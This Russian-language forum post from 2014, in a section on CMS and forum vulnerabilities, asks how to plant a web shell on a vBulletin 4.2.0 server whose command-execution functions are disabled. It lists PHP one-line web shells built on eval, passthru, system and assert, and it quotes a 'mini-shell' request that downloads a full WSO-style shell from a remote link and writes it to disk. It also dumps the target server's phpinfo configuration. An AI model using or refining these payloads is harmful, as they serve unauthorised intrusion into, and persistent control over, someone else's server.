Форумы нужен совет гуру перепробывал многое с vb 4

Discussion in 'Уязвимости CMS/форумов' started by Netu48, 9 Oct 2014.

  1. Netu48

    Netu48 New Member

    Joined:
    25 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Приветствую,уважаемые форумчане.Подскажите,пожалуйста,может кто знает нестандартный способ заливки шелла на форумный движок vbulletin 4.2.0 nulled rus.Дело в том,что все стандартные схемы,которые изложени в сети не подходят для данной версии движка + это vps и отключены функции system и shell execute.

    Что я пробовал :
    Через менеджер плагинов выполнить RFI как описано здесь
    Через,файл стилей как показано тут или тут
    Также,пробывал лить через,скины и с помощью различных команд:
    <?eval($_GET[cmd])?>

    PHP код:
    <?passthru($_GET[cmd])?>

    PHP код:
    <?eval($_REQUEST[cmd])?>

    PHP код:
    <?passthru($_REQUEST[cmd])?>

    PHP код:
    <?system($_REQUEST[cmd])?>

    PHP код:
    <?assert($_GET[cmd])?>
    Не выполняется,тупо белый экран.Также пробовал этот метод
    №3 - Что касается "Мини-шелла"

    Итак, опять же допустим, что вы закачали "мини шелл", но теперь бы вам надо залить нормальный, WSO к примеру.
    Пробуем:

    http://host.ru/shell.php?cmd=$url = "Ссылка_на_шелл.txt";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);

    Но тут очень часто бывает облом - либо нельзя, чтобы был пробел, либо нельзя, чтобы были кавычки. "Заброшу ка я сервер" - наверное подумали вы.. но нет, конечно, вы правы, чтобы задать тип переменной в php типа string, не мешало бы значение поместить в кавычки, а вот оказывается нет. Достаточно использовать функцию chr(); Эта функция "преобразовывает" ASCII в "обычный текст", таблицу таких символов можно взять тут - http://www.asciitable.com/ И соответственно, получаем код, к примеру (рабочий):


    данные о сервере :

    PHP Version 5.3.3-7+squeeze19

    System Linux vm2785 2.6.32-042stab092.2 #1 SMP Tue Jul 8 10:35:55 MSK 2014 i686
    Build Date Feb 18 2014 13:57:17
    Directive Local Value Master Value
    allow_call_time_pass_reference Off Off
    allow_url_fopen On On
    allow_url_include Off Off
    always_populate_raw_post_data Off Off
    arg_separator.input & &
    arg_separator.output & &
    asp_tags Off Off
    auto_append_file no value no value
    auto_globals_jit On On
    auto_prepend_file no value no value
    browscap no value no value
    default_charset no value no value
    default_mimetype text/html text/html
    define_syslog_variables Off Off
    disable_classes no value no value
    disable_functions exec,passthru,shell_exec,system,proc_open,popen exec,passthru,shell_exec,system,proc_open,popen
    display_errors Off Off
    display_startup_errors Off Off
    doc_root no value no value
    docref_ext no value no value
    docref_root no value no value
    enable_dl Off Off
    error_append_string no value no value
    error_log no value no value
    error_prepend_string no value no value
    error_reporting 30711 22527
    exit_on_timeout Off Off
    expose_php On On
    extension_dir /usr/lib/php5/20090626+lfs /usr/lib/php5/20090626+lfs
    file_uploads On On
    highlight.bg #FFFFFF #FFFFFF
    highlight.comment #FF8000 #FF8000
    highlight.default #0000BB #0000BB
    highlight.html #000000 #000000
    highlight.keyword #007700 #007700
    highlight.string #DD0000 #DD0000
    html_errors Off Off
    ignore_repeated_errors Off Off
    ignore_repeated_source Off Off
    ignore_user_abort Off Off
    implicit_flush Off Off
    include_path .:/usr/share/php:/usr/share/pear .:/usr/share/php:/usr/share/pear
    log_errors On On
    log_errors_max_len 1024 1024
    magic_quotes_gpc Off Off
    magic_quotes_runtime Off Off
    magic_quotes_sybase Off Off
    mail.add_x_header On On
    mail.force_extra_parameters no value no value
    mail.log no value no value
    max_execution_time 30 30
    max_file_uploads 20 20
    max_input_nesting_level 64 64
    max_input_time 60 60
    max_input_vars 1000 1000

    удаленная загрузка шелла не получилась через модули и плагины работает,только phpinfo.
    Может,кто что-то подскажет,буду очень благодарен.
    Ребята,почти любая команда выдает былый экран что делать,я уже и get_content перепробовал...
     
    #1 Netu48, 9 Oct 2014
    Last edited: 10 Oct 2014
Loading...